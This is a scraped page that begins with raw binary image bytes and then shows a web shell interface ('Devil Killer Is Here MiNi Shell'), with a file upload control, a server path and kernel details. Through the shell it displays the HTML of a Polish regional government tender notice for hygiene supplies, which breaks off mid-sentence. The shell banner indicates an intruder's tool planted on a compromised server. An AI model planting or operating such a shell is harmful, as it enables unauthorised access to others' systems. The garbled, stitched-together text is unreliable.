JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230516/0021847401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa artykułów higienicznych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Województwo Pomorskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191674836</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Okopowa 21/27</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-810</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@pomorskie.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.pomorskie.eu/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa artykułów higienicznych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-accf3509-ea4f-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00218474</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-05-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00041364/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.5 Zakup artykułów higienicznych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pomorskie <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/pomorskie</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Postępowanie prowadzone jest w j. polskim w formie elektronicznej za pośrednictwem Platformy zakupowej<br/>2.Komunikacja między zamawiającym a wykonawcami,w tym wszelkie oświadczenia,wnioski, zawiadomienia oraz informacje,przekazywane winny być za pośrednictwem Platformy zakupowej za pomocą formularza„Wyślij wiadomość do zamawiającego”<br/>3.Za datę przekazania (wpływu) oświadczeń,wniosków,zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem Platformy zakupowej poprzez kliknięcie przycisku„Wyślij wiadomość do zamawiającego” po których pojawi się komunikat,że wiadomość została wysłana do zamawiającego<br/>4.Zamawiający dopuszcza,awaryjnie,komunikację za pośrednictwem poczty elektronicznej.Adres poczty elektronicznej osoby uprawnionej do kontaktu z Wykonawcami: zamowienia@pomorskie.eu<br/>5.Zamawiający będzie przekazywał wykonawcom informacje elektronicznie za pośrednictwem Platformy zakupowej.Informacje,zawiadomienia,zmiany, odpowiedzi-zamawiający będzie zamieszczał na Platformie zakupowej. Korespondencja,której zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca,będzie przekazywana elektronicznie za pośrednictwem Platformy zakupowej do konkretnego wykonawcy na adres mailowy wskazany w ofercie Wykonawcy<br/>6.Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości przesłanych przez zamawiającego, bezpośrednio na Platformie zakupowej oraz na poczcie elektronicznej–adresie wskazanym w ofercie,przesłanych przez zamawiającego,gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM<br/>7.Zamawiający wskazuje niezbędne wymagania techniczne umożliwiające pracę na Platformie zakupowej,tj.:1)stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 256kb/s, 2)przeglądarka internetowa EDGE,Chrome lub FireFox w najnowszej dostępnej wersji,z włączoną obsługą języka Javascript,akceptująca pliki typu„cookies”,<br/>Ponadto Zamawiający informuje,że występuje limit objętości plików lub spakowanych folderów w zakresie całej oferty lub wniosku do ilości 10 plików lub spakowanych folderów (pliki można spakować programem do archiwizacji np 7-Zip) przy maks. wielkości 150 MB.<br/>8.Wykonawca,przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1)akceptuje warunki korzystania z Platformy zakupowej określone w Regulaminie zamieszczonym na stronie internetowej Platformy pod linkiem w zakładce„Regulamin&#34;oraz uznaje go za wiążący<br/>2)zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod adresem https://platformazakupowa.pl/strona/45-instrukcje<br/>9.Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z Platformy zakupowej w szczególności za sytuację,gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert(np.złożenie oferty w zakładce„Wyślij wiadomość do zamawiającego”).Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony w art.221 ustawy Pzp<br/>10.Zamawiający informuje,że instrukcje korzystania z Platformy zakupowej, dotyczące w szczególności logowania,składania wniosków o wyjaśnienie treści SWZ,składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy zakupowej znajdują się w zakładce„Instrukcje dla Wykonawców&#34;na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje Pozostałe informacje zawarte na Platformie,a nie dotyczące technicznego z niej korzystania,nie są wiążące dla Wykonawców<br/>11.W zakresie kwestii nieuregulowanych niniejszą SWZ obowiązują przepisy ustawy Pzp oraz Rozporządzenia Prezesa Rady Ministrów z dnia z dn. 30.12.2020r.w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.Urz. UE L 119 z 4.5.2016 r., str. 1), dalej „RODO”, informuję, że: <br/>1. Administratorem Pani/Pana danych osobowych jest Zarząd Województwa Pomorskiego z siedzibą przy ul. Okopowej 21/27, 80-810 Gdańsk, tel. 58 326 87 58 adres e-mail: zamowienia@pomorskie.eu<br/>2. W sprawach związanych z Pani/Pana danymi osobowymi proszę kontaktować się z Inspektorem Ochrony Danych (IOD): e-mail: iod@pomorskie.eu<br/>3. Pani/Pana dane osobowe przetwarzane będą w celu przeprowadzenia postępowania i udzieleniu zamówienia, prowadzenia dokumentacji księgowo-podatkowej, archiwizacji danych, dochodzenia roszczeń lub obrony przed roszczeniami.<br/>4. Podstawą przetwarzania danych osobowych jest:<br/>1) ustawa z 11.9.2019 r. – Prawo zamówień publicznych;<br/>2) ustawa z 27.8.2009 r. o finansach publicznych;<br/>3) ustawa z 14.7.1983 r. o narodowym zasobie archiwalnym i archiwach;<br/>4) art. 6 pkt.1 lit. c RODO <br/>– przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze.<br/>5. Odbiorca lub kategorie odbiorców: podmioty upoważnione na podstawie zawartych umów powierzenia oraz uprawnione na mocy obowiązujących przepisów prawa, w szczególności osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania na podstawie art. 18 oraz art. 74–76 ustawy Pzp. Zasada jawności ma zastosowanie do wszystkich danych osobowych, z wyjątkiem danych, o których mowa w art. 9 ust. 1 RODO (szczególna kategoria danych).<br/>6. Pani/Pana dane osobowe będą przechowywane do czasu zakończenia obowiązującego nas okresu archiwizacji.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">7. Posiada Pani/Pan prawo:<br/>1) żądania dostępu do danych; w przypadku gdy wykonanie tego obowiązku, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może, zgodnie z art. 75 ustawy Pzp, żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia;<br/>2) żądania sprostowania lub uzupełnienia danych osobowych; zgodnie z art. 76 ustawy Pzp wykonanie tego obowiązku nie może naruszać integralności protokołu postępowania oraz jego załączników;<br/>3) usunięcia danych w przypadku, gdy dane osobowe nie są już niezbędne do celów, w których zostały zebrane, lub w inny sposób przetwarzane;<br/>4) żądania ograniczenia przetwarzania danych osobowych; zgodnie z art. 74 ust. 3 PZP wykonanie tego obowiązku nie ogranicza przetwarzania danych osobowych do czasu zakończenie postępowania o udzielenie zamówienia.<br/>8. Przysługuje Pani/Pan prawo do wniesienia skargi do organu nadzorczego, tj. Urzędu Ochrony Danych Osobowych ul. Stawki 2, 00-913 Warszawa.<br/>9. Pani/Pana dane osobowe nie będą poddawane zautomatyzowanemu podejmowaniu decyzji, w tym również profilowaniu.<br/>10.	Pani/Pana dane osobowe nie będą przekazywane do państw trzecich.<br/>11.	Podanie danych osobowych jest wymogiem ustawowym określonym w przepisach PZP, związanych z udziałem w postępowaniu o udzielenie zamówienia; konsekwencje niepodania określonych danych wynikają z PZP.<br/>12.	Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z włączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DAZ-Z.272.5.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest dostawa artykułów higienicznych. Do obowiązków Wykonawcy należeć będzie dostarczenie Zamawiającemu własnym transportem i na własny koszt, wraz z wniesieniem, artykułów higienicznych, określonych w załączniku nr 2a do SWZ, do wskazanego przez Zamawiającego miejsca (pomieszczenia) w budynku Urzędu Marszałkowskiego Województwa Pomorskiego przy ulicy Okopowej 21/27, Augustyńskiego 1 oraz Augustyńskiego 2, w ilościach określonych wg bieżących potrzeb Zamawiającego.<br/>Zamawiający gwarantuje zrealizowanie umowy na poziomie nie mniejszym niż 90% wartości brutto umowy.<br/>2. Dostawy będą realizowane sukcesywnie, w miarę potrzeb Zamawiającego, na podstawie zamówień wystawianych każdorazowo z podaniem asortymentu i ilości zamawianych artykułów.<br/>3. Koszty transportu i opakowania pokrywa Wykonawca.<br/>4. Dostarczane artykuły muszą być oryginalnie zapakowane / zamknięte i pozbawione wad prawnych i fizycznych.<br/>5. We wszystkich zapisach SWZ oraz jej załącznikach, w których Zamawiający odwołuje się do norm, aprobat, specyfikacji technicznych lub systemów odniesienia bądź wskazane są znaki towarowe, parametry lub źródła pochodzenia (nazwy producentów lub artykułów), zgodnie z art. 99 ust. 5 oraz art. 101 ust. 4 ustawy Pzp Zamawiający dopuszcza rozwiązania równoważne.<br/>6. W przypadku, gdy w opisie przedmiotu zamówienia podano nazwy artykułów, produktów konkretnych producentów to należy traktować to jedynie jako określenie pożądanego standardu i jakości. We wszystkich takich sytuacjach Wykonawca może zaoferować równoważne artykuły, produkty o co najmniej takich samych parametrach technicznych oraz jakościowych. Przez równoważność produktu rozumie się zaoferowanie produktu, którego parametry techniczne zastosowanych materiałów, wydajność, trwałość oraz jakość jest nie gorsza od jakości materiałów, produktów opisanych w SWZ.<br/>7. Wykonawca, który powołuje się na rozwiązania równoważne, jest zobowiązany wykazać, że oferowane przez niego rozwiązanie spełnia wymagania określone przez zamawiającego. W takim przypadku, wykonawca załącza do oferty wykaz rozwiązań równoważnych wraz z jego opisem lub normami.<br/>8. Szczegółowy opis przedmiotu zamówienia określony został we wzorze formularza asortymentowo-cenowego (stanowiącym załącznik nr 2a do SWZ) oraz we wzorze umowy (stanowiącym załącznik nr 1 do SWZ).<br/>9. Zamawiający nie dopuszcza możliwości złożenia oferty wariantowej, o której mowa w art. 92 ustawy Pzp, tzn. oferty przewidującej odmienny sposób wykonania zamówienia niż określony w niniejszej SWZ.<br/>10.	Zamawiający nie przewiduje zawarcia umowy ramowej i ustanowienia dynamicznego systemu zakupów oraz nie przewiduje wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej. <br/>11.	Zamawiający nie przewiduje udzielania zamówień na podstawie art. 214 ust. 1 pkt 8 ustawy Pzp.<br/>12.	Zamawiający nie dopuszcza składania oferty w postaci katalogów elektronicznych ani dołączania katalogów elektronicznych do oferty, w sytuacji określonej w art. 93 ustawy Pzp.<br/>13.	Zamawiający nie zastrzega możliwości ubiegania się o zamówienie wyłącznie przez Wykonawców, o których mowa w art. 94 ustawy Pzp.<br/>14.	Zamawiający nie przewiduje rozliczenia w walutach obcych. Rozliczenie zamówienia prowadzone jest w PLN.<br/>15.	Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu. <br/>16.	Zamawiający nie przewiduje udzielenia zaliczek na poczet wykonania zamówienia.<br/>17.	Zamawiający nie wymaga wzięcia udziału w wizji lokalnej/sprawdzenia przez Wykonawcę dokumentów niezbędnych do realizacji zamówienia.<br/>18.	Zamawiający nie dopuszcza możliwości składania ofert częściowych (zamówienie nie zostało podzielone na części). <br/>Podział zamówienia nie jest zasadny, gdyż wolumen zamówienia pozwala na złożenie oferty zarówno przez małych jak i średnich przedsiębiorców.<br/>19.	Podwykonawstwo:<br/>1)	Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy (podwykonawcom).<br/>2)	W związku z realizacją zamówienia zamawiający nie zastrzega obowiązku osobistego wykonania kluczowych zadań zamówienia. <br/>3)	Zamawiający żąda wskazania przez wykonawcę w ofercie, części zamówienia, których wykonanie zamierza powierzyć podwykonawcom oraz podania (jeżeli są już znani) nazwy tych podwykonawców.<br/>4)	Powierzenie wykonania części zamówienia podwykonawcom nie zwalnia wykonawcy z odpowiedzialności za należyte wykonanie umowy.<br/>20.	Zamawiający wymaga, aby przedmiot zamówienia był wykonany zgodnie z wymaganiami zawartymi we wzorze formularza asortymentowo-cenowego (stanowiącym załącznik nr 2a do SWZ) oraz zgodnie ze wzorem umowy (stanowiącym załącznik nr 1 do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33760000-5 - Papier toaletowy, chusteczki higieniczne, ręczniki do rąk i serwety</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33711900-6 - Mydło</p> <p class="mb-0">33700000-7 - Produkty do pielęgnacji ciała</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wszystkie oferty niepodlegające odrzuceniu oceniane będą na podstawie kryterium oceny ofert. <br/>2. Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się jedynym kryterium oceny ofert jakim jest cena oferty brutto - 100%.<br/>3. Sposób oceny ofert i przyznawania punktów: <br/>Cena oferty brutto z wagą 100 % zostanie obliczona w następujący sposób: <br/><br/>Liczba przyznanych punktów = najniższa zaoferowana cena brutto / cena ocenianej oferty x 100 <br/><br/>Oferta najkorzystniejsza otrzyma 100 punktów, pozostałe oferty zgodnie z powyższym wzorem. <br/>Przy czym 1 % = 1 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający wymaga spełnienia warunku udziału w postępowaniu w zakresie zdolności technicznej lub zawodowej:<br/>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże, że posiada wiedzę i doświadczenie, co należycie udokumentuje tj. wykaże, że w okresie ostatnich 3 lat licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, należycie wykonał co najmniej 2 dostawy artykułów higienicznych - przy czym wartość każdej dostawy wyniosła nie mniej niż 150 000,00 zł brutto (przez wartość brutto dostawy należy rozumieć wysokość wynagrodzenia uzyskanego przez Wykonawcę za wykonanie tej dostawy). <br/>UWAGA: <br/>a) przez dwie odrębne dostawy rozumie się dostawy wykonane na podstawie dwóch różnych zleceń/umów, <br/>b) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, wyżej wymieniony warunek udziału w postępowaniu winien spełniać w całości co najmniej jeden z Wykonawców, <br/>c) jeżeli Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu polega na zdolnościach technicznych lub zawodowych innego podmiotu, powyższy warunek zostanie uznany za spełniony, jeżeli spełnia go w całości ten podmiot,<br/>d) w przypadku, gdy za wykonane przez Wykonawcę dostawy rozliczenie nastąpiło w walucie innej niż w PLN, Wykonawca w celu potwierdzenia spełniania warunku udziału w niniejszym postępowaniu, zobowiązany jest do przeliczenia wartości wykonanych dostaw przyjmując średni kurs złotego w stosunku do walut obcych określony w tabeli kursów średnich walut obcych Narodowego Banku Polskiego - opublikowanych na dzień zamieszczenia Ogłoszenia o zamówieniu oraz Specyfikacji Warunków Zamówienia na stronie Zamawiającego. <br/>2. Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy - może mieć negatywny wpływ na realizację zamówienia.<br/>3. W przypadku posługiwania się przez wykonawcę cudzym potencjałem (podmiot trzeci), wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają dostawy, do realizacji których te zdolności są wymagane.<br/>4. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie żąda podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia. Tym samym, zamawiający dokona weryfikacji wyłącznie na podstawie oświadczenia wstępnego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający 